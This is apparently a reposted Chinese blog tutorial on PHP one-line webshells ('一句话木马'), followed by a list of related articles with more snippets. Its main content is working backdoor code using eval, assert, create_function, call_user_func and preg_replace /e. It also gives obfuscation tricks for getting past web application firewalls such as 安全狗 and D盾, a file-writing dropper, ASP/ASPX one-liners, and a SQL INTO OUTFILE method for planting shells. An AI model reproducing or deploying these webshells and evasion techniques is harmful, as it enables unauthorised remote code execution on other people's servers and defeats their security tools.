webshell之一句话木马变形

什么是一句话木马

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。

我们如何发送命令,发送的命令如何执行?

我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[‘ ‘]、$_POST[‘ ‘]、$_COOKIE[‘ ‘]接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。

例如:

其中eval就是执行命令的函数,$_POST[‘a‘]就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

示例:

因为木马是接收post请求中 “a” 的数据( $_POST[‘a’]),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,( 就像这样: http://127.0.0.1/test.php?a=phpinfo(); )我就不再另行演示了。

使用 其他函数制作一句话木马

assert函数

#
<?php assert(@$_POST[‘a‘]); ?>
create_function函数
<?php
$fun = create_function(‘‘,$_POST[‘a‘]);
$fun();
?>

把用户传递的数据生成一个函数fun(),然后再执行fun()

call_user_func回调函数

#
<?php
@call_user_func(assert,$_POST[‘a‘]);
?>

call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。

preg_replace函数

#
<?php
@preg_replace("/abcde/e", $_POST[‘a‘], "abcdefg");
?>

这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。

file_put_contents函数

利用函数生成木马

#
<?php
$test=‘<?php $a=$_POST["cmd"];assert($a); ?>‘;
file_put_contents("Trojan.php", $test);
?>

函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。

如何让一句话木马绕过waf ?

waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。

PHP变量函数

#
<?php
$a = "eval";
$a(@$_POST[‘a‘]);
?>

第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。

PHP可变变量

#
<?php
$bb="eval";
$a="bb";
$$aa($_POST[‘a‘]);
?>

看这句就能理解上述语句:$$aa = $($aa) = $ (‘bb’) = $bb = "eval"

str_replace函数

#
<?php
$a=str_replace("Waldo", "", "eWaldoval");
$a(@$_POST[‘a‘]);
?>

函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。

base64_decode函数

#
<?php
$a=base64_decode("ZXZhbA==")
$a($_POST[‘a‘]);
?>

这里是base64解密函数,"ZXZhbA=="是eval的base64加密。

"."操作符

#
<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST[‘a‘]);
?>

parse_str函数

#
<?php
$str="a=eval";
parse_str($str);
$a($_POST[‘a‘]);
?>

执行这个函数后,生成一个变量$a,值为字符串"eval"

更多技巧...

多实战,多谷歌! 上述六种技巧每一种单独使用都不能绕过waf,但是与 第三大点提到的函数混合起来使用,就可以顺利的欺骗waf。 tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。

再来一个小栗子

#
<?php
function fun()
{return $_POST[‘a‘];}
@preg_replace("/test/e",fun(),"test test test");
?>

这里又有一个技巧,创建函数 fun(),返回post中“a”的数据。我的这个例子很明显是一句话木马,但是安全狗却扫不出,D盾也是如此。

原文地址:https://www.cnblogs.com/-qing-/p/10816874.html

时间: 2024-08-02 03:43:53

webshell之一句话木马变形的相关文章

一句话木马(webshell)是如何执行命令的

在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析. 首先我们先看一个原始而又简单的php一句话木马. <?php @eval($_POST['cmd']); ?> 看到这里不得不赞美前辈的智慧. 对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一眼就是密码是cmd,通过pos

常见的一句话木马

一句话木马入侵原理 <%execute request("#")%>是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件. 仔细观察一下<%execute request("#")%>这句代码,括号里的"#"是我们一句话的密码,我们可以把它改成任意字符,这样可以避免别人发现我们的一句话木马后,轻松的通过它捡个大便宜,如果我们上传的一句话代码为<%execute request("

一句话木马

1.一句话说明 常用的一句话有冰狐浪子的一句话,蓝屏的,lack2的,当然还有海洋的.我们如果知道了一句话的原理.自己也可以很轻松的写一个. <%execute(request("cmd"))%> <%execute request("1")%> ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾 密码a 2.简单演示 1>.一句话你要写入数据库,数据库必须是asp格式或者我们能够通过备份备份为asp格式.用客户端连接这个asp的数据库.

渗透技术--SQL注入写一句话木马原理

讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\log1.txt' 这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面.利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell. 本地的目标站点来实战一下,我们的目的是在目标的物理路径D:/WWW/下面生成一个php文件,从而可以使我们用菜刀连接上去: 先简单的判断

DBO权限日志备份专用一句话木马 - 寒龙网出品 以前的博客站因为程序错乱改为反病毒联盟后 本博客基于博客园地 感谢关注

备分专用一句话 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小. 日志备分WEBSHELL标准的七步: 1.InjectionURL';alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式) 2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表) 3.InjectionURL';backup lo

脚本后门注入图片新方法&lt;图片+一句话木马&gt;

创建一个 shell.php 的一句话木马,通过 window 下 copy 命令 copy 123.png+shell.php  123.png 重新生成一个 123.png 的图片. 上传到服务服务器上,直接拿菜刀连.

各种过安全狗一句话木马

几个变性的asp–过防火墙 过狗效果都不错 <%Y=request("x")%> <%execute(Y)%> <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%> 这个是90sec发的 <%eval""&("e"&"v"&&

关于asp、php,jps一句话木马--中国菜刀使用

工具下载地址:http://pan.baidu.com/s/1o6jxAgq 这里的asp后门不指像那些一句话木马.砍客.冰狐.明小子之类的b/s型的,只指像cmd.asp或2005a.asp的. 第一个,来看zzzeva免fso的cmd.asp 代码如下:<form method="post"> <input type=text name="cmd" size=60> <input type=submit value="ru

常用一句话木马

asp一句话木马: <%execute(request("value"))%> php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马: <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%> 其他一句话木马: <%eval request("value")%&g